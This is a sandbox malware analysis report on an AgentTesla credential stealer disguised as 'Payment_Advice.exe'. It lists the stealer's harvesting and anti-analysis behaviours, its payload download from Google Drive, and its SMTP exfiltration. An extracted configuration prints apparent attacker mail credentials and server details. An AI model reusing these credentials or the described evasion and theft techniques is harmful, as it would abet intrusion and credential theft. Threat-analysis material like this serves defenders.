Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Payment_Advice.exe

Overview

General Information

Sample Name:Payment_Advice.exe
Analysis ID:1363
MD5:3a27f66a430a3b54d24fb8f75e837175
SHA1:4af41cd66669d3c2307c1b5af5c198778d174826
SHA256:dd996392170826c47b9ab378464423e470a1bdfdff7bcd183c61e3e7896d4326
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: RegAsm connects to smtp port
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Executable has a suspicious name (potential lure to open the executable)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Payment_Advice.exe (PID: 3432 cmdline: 'C:\Users\user\Desktop\Payment_Advice.exe' MD5: 3A27F66A430A3B54D24FB8F75E837175)
    • RegAsm.exe (PID: 7244 cmdline: 'C:\Users\user\Desktop\Payment_Advice.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 2548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comforceconnor36@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: RegAsm.exe PID: 7244JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: RegAsm.exe PID: 7244JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Overview

          Networking:

          barindex
          Sigma detected: RegAsm connects to smtp portShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 188.93.227.195, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 7244, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49795

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: Payment_Advice.exe.3432.1.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comforceconnor36@gmail.com"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Payment_Advice.exeReversingLabs: Detection: 11%
          Antivirus detection for URL or domainShow sources
          Source: http://mail.tccinfaes.comAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URLShow sources
          Source: mail.tccinfaes.comVirustotal: Detection: 8%Perma Link
          Source: http://mail.tccinfaes.comVirustotal: Detection: 8%Perma Link
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C9B54FC CryptUnprotectData,5_2_1C9B54FC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C9B5C68 CryptUnprotectData,5_2_1C9B5C68
          Source: Payment_Advice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.11.20:49793 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49794 version: TLS 1.2

          Networking:

          barindex
          Source: Joe Sandbox ViewASN Name: CLARANET-ASClaraNETLTDGB CLARANET-ASClaraNETLTDGB
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox ViewIP Address: 188.93.227.195 188.93.227.195
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ush64eeGGoMv4pcIA9UNmkEac9u-lIf4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9fjtv4086ilnjilp52k3eek3iqkbfarb/1632745650000/00519186742208262786/*/1ush64eeGGoMv4pcIA9UNmkEac9u-lIf4?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-50-docs.googleusercontent.comConnection: Keep-Alive
          Source: global trafficTCP traffic: 192.168.11.20:49795 -> 188.93.227.195:587
          Source: global trafficTCP traffic: 192.168.11.20:49795 -> 188.93.227.195:587
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: RegAsm.exe, 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: RegAsm.exe, 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
          Source: RegAsm.exe, 00000005.00000002.34498118472.0000000000DFF000.00000004.00000020.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
          Source: RegAsm.exe, 00000005.00000002.34510158729.000000001DD00000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
          Source: RegAsm.exe, 00000005.00000002.34498118472.0000000000DFF000.00000004.00000020.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
          Source: RegAsm.exe, 00000005.00000003.29936323610.0000000000E4C000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: RegAsm.exe, 00000005.00000003.29936323610.0000000000E4C000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: RegAsm.exe, 00000005.00000002.34498118472.0000000000DFF000.00000004.00000020.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
          Source: RegAsm.exe, 00000005.00000002.34510114513.000000001DCFA000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.34509995210.000000001DCE9000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.34510306374.000000001DD25000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.30855905481.000000001C861000.00000004.00000001.sdmpString found in binary or memory: http://kwpik2VAR1e4qwGX.org
          Source: RegAsm.exe, 00000005.00000002.34510158729.000000001DD00000.00000004.00000001.sdmpString found in binary or memory: http://mail.tccinfaes.com
          Source: RegAsm.exe, 00000005.00000002.34510158729.000000001DD00000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0)
          Source: RegAsm.exe, 00000005.00000002.34510158729.000000001DD00000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
          Source: RegAsm.exe, 00000005.00000002.34510158729.000000001DD00000.00000004.00000001.sdmpString found in binary or memory: http://tccinfaes.com
          Source: RegAsm.exe, 00000005.00000002.34497807320.0000000000DB8000.00000004.00000020.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: RegAsm.exe, 00000005.00000002.34497807320.0000000000DB8000.00000004.00000020.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: RegAsm.exe, 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmpString found in binary or memory: http://ymvmIY.com
          Source: RegAsm.exe, 00000005.00000003.29936323610.0000000000E4C000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
          Source: RegAsm.exe, 00000005.00000003.29940609468.0000000000E47000.00000004.00000001.sdmpString found in binary or memory: https://doc-0c-50-docs.googleusercontent.com/
          Source: RegAsm.exe, 00000005.00000003.29936761662.0000000000E4C000.00000004.00000001.sdmpString found in binary or memory: https://doc-0c-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9fjtv408
          Source: RegAsm.exe, 00000005.00000002.34497807320.0000000000DB8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
          Source: RegAsm.exe, 00000005.00000002.34497807320.0000000000DB8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/%
          Source: RegAsm.exe, 00000005.00000002.34497807320.0000000000DB8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ush64eeGGoMv4pcIA9UNmkEac9u-lIf4
          Source: RegAsm.exe, 00000005.00000003.29936728119.0000000000E47000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ush64eeGGoMv4pcIA9UNmkEac9u-lIf4_8Ni776JkBaCRGsu4
          Source: RegAsm.exe, 00000005.00000002.34499400097.0000000000EF0000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ush64eeGGoMv4pcIA9UNmkEac9u-lIf4wininet.dllMozilla/5
          Source: RegAsm.exe, 00000005.00000002.34509696267.000000001DCA4000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
          Source: RegAsm.exe, 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
          Source: RegAsm.exe, 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
          Source: RegAsm.exe, 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
          Source: RegAsm.exe, 00000005.00000002.34509696267.000000001DCA4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
          Source: RegAsm.exe, 00000005.00000002.34508937788.000000001DBF1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
          Source: unknownDNS traffic detected: queries for: drive.google.com
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ush64eeGGoMv4pcIA9UNmkEac9u-lIf4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9fjtv4086ilnjilp52k3eek3iqkbfarb/1632745650000/00519186742208262786/*/1ush64eeGGoMv4pcIA9UNmkEac9u-lIf4?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-50-docs.googleusercontent.comConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.11.20:49793 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49794 version: TLS 1.2

          System Summary:

          barindex
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Payment_Advice.exe
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: Payment_Advice.exeStatic file information: Suspicious name
          Source: Payment_Advice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A469885_2_00A46988
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A414105_2_00A41410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A811305_2_00A81130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A8BA305_2_00A8BA30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A83A505_2_00A83A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A843205_2_00A84320
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A8C7905_2_00A8C790
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A837085_2_00A83708
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C9998685_2_1C999868
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C99AAE25_2_1C99AAE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C99AA005_2_1C99AA00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C99EFCD5_2_1C99EFCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C991D285_2_1C991D28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C9933305_2_1C993330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C9B84785_2_1C9B8478
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C9BEDB85_2_1C9BEDB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C9B19B05_2_1C9B19B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C9BD2B85_2_1C9BD2B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C9BDAA05_2_1C9BDAA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C9BED5A5_2_1C9BED5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C9B32305_2_1C9B3230
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C9B32405_2_1C9B3240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1DA45E085_2_1DA45E08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1DA44ACC5_2_1DA44ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1DA45DC15_2_1DA45DC1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1DA46AF15_2_1DA46AF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_1C9971E05_2_1C9971E0
          Source: Payment_Advice.exe, 00000001.00000002.29963314832.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAFFEJENDES.exe vs Payment_Advice.exe
          Source: Payment_Advice.exeBinary or memory string: OriginalFilenameAFFEJENDES.exe vs Payment_Advice.exe
          Source: Payment_Advice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
          Source: Payment_Advice.exeReversingLabs: Detection: 11%
          Source: Payment_Advice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Payment_Advice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Payment_Advice.exe 'C:\Users\user\Desktop\Payment_Advice.exe'
          Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Payment_Advice.exe'
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Payment_Advice.exe' Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\Payment_Advice.exeFile created: C:\Users\user\AppData\Local\Temp\~DFA24114A7483D93DE.TMPJump to behavior
          Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@4/1@3/3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2548:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2548:304:WilStaging_02
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_0040407C pushfd ; retf 1_2_0040417B
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_00404004 pushfd ; retf 1_2_0040417B
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_004040D2 pushfd ; retf 1_2_0040417B
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_00406AAD push edi; retf 1_2_00406AB8
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_00408578 push BCCCD893h; retf 1_2_0040857D
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_00405124 push ebp; ret 1_2_00405126
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_0040332B pushad ; ret 1_2_004034E9
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_004053ED push 98EC4AA3h; iretd 1_2_00405421
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_004031F9 push cs; retf 1_2_004031FA
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_00403397 pushad ; ret 1_2_004034E9
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_0040639F push eax; iretd 1_2_004063A0
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_00406BB3 push edi; ret 1_2_00406BC2
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_022D0028 push ebx; retf 1_2_022D003F
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_022D3440 pushfd ; ret 1_2_022D3442
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_022D5C9E push ecx; iretd 1_2_022D5C9F
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_022D091A push cs; iretd 1_2_022D091B
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 1_2_022D23D4 push cs; iretd 1_2_022D23E3
          Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
